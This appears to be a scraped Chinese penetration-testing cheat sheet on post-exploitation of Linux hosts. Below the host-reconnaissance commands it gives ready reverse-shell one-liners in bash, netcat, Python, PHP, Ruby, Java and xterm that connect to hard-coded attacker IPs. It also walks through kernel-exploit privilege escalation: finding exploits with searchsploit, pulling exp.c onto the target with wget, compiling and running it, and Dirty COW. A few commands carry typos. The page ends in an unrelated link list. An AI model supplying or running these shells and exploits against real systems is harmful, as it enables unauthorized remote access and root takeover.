常用命令uname -a # 查看内核/操作系统/cpu信息 hend -n 1 /etc/issue # 查看操作系统版本 cat /proc/version # 查看系统信息 hostname # 查看计算机名 env # 查看环境变量 ifconfig # 查看网卡.NETstat -lntp # 查看所有监听端口 netstat -antp # 查看所有已经建立的连接 netstat -s # 查看网络统计信息 iptables -L # 查看防火墙设置 route -n # 查看路由表 ps -ef # 查看所有进程 top # 实时显示进程状态 w # 查看活动用户 id # 查看指定用户信息 last # 查看用户登录日志 cut -d: -f1 /etc/passwd # 查看系统所有用户 cut -d: -f1 /etc/group # 查看系统所有组 crontab -l # 查看当前用户的计划任务 chkconfig –list # 列出所有系统服务 chkconfig –list | grep on # 列出所有启动的系统服务 echo $PATH # 查看系统路径 反弹shell
在本地使用nc 进行监听
nc -lvnp 8888
bash反弹shell
bash -i >& /dev/tcp/ip_address/port 0>&1 bash -c "bash -i >& /dev/tcp/192.168.0.189/6666 0>&1"
nc反弹shell
nc -e /bin/sh 192.168.2.130 4444 # 但某些版本的nc没有-e参数(非传统版),则可使用以下方式解决 rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
Python/ target=_blank class=infotextkey>Python反弹shell
import socket,subprocess,os s =socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(( "192.168.2.130" , 4444 )) os.dup2(s.fileno(), 0 ) os.dup2(s.fileno(), 1 ) os.dup2(s.fileno(), 2 ) p = subprocess.call([ "/bin/bash" , "-i" ])
php反弹shell
php -r '$sock=fsockopen("192.168.2.130",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
ruby反弹shell
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
JAVA反弹shell
r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do $line 2>&5 >&5; done"] as String[]) p.waitFor()
xterm反弹shell
xterm -display 10.0.0.1:1 python调用本地shell实现交互式命令行
终端有些时候系统的命令终端不允许直接访问,可以使用python虚拟化一个终端来执行
# python2 python -c 'import pty;pty.spawn("/bin/bash")' # python3 python3 -c 'import pty;pty.spawn("/bin/bash")' linux反弹shell解决乱码
ctrl+z 放置后台任务 设置原始格式
stty -echo raw
fg再调用后台任务
LINUX 内核漏洞提权
通常我们在拥有一个webshell的时候,一般权限都是WEB容器权限,如在iis就是iis用户组权限,在Apache 就是apache权限,一般都是权限较低,均可执行一些普通命令,如查看当前用户,网络信息,ip信息等 。如果我想进行内网渗透就必须将权限提权到最高,如系统权限 超级管理员权限 。
内核溢出提权
利用堆栈溢出漏洞,根据当前系统 寻找对应的漏洞的exp 使用exp对其进行提权 。
使用以下命令进行信息收集
uname -a cat /proc/version cat /etc/issue cat /etc/redhat-release lsb_release -a
根据linux的内核版本去找对应的exp
文章插图
使用kali自带的工具进行搜索exp
searchsploit -t Ubuntu 14.04 searchsploit -s Ubuntu 14.04 searchsploit -s Linux Kernel 3.13.0
文章插图
查看描述
searchsploit -x linux/local/37088.c
文章插图
在目标机器上使用 wget下载源代码然后使用gcc进行编译
python3 -m http.service 80 wget http://192.168.150.145/exp.c gcc exp.c -o exp chmod 777 exp ./exp
文章插图
脏牛提权 CVE-2016-5195
该漏洞是 Linux 内核的内存子系统在处理写时拷贝(Copy-on-Write)时存在条件竞争漏洞,导致可以破坏私有只读内存映射 。黑客可以在获取低权限的的本地用户后,利用此漏洞获取 其他只读内存映射的写权限,进一步获取 root 权限 。
推荐阅读
- Linux查看端口号被占用的命令 linux端口号是否被占用
- 常用空调的坏处 工业空调的好处以及使用注意事项有哪些
- 眼妆|日常用好4个方法,不用节食,或许也能快速瘦身,值得尝试
- 8个常用的小偏方治牛皮癣 偏方治疗牛皮癣
- 保湿|女士身体乳哪个牌子好 十款女生常用的身体乳牌子盘点
- 常用证件照尺寸是什么样的 一寸照片像素
- 个人办公用品清单有哪些 办公室常用办公用品清单一览
- linux 根据文件内容查找文件 linux按文件内容查找
- 小学生常用歇后语和谚语?小学常用的歇后语大全
- Linux权限解析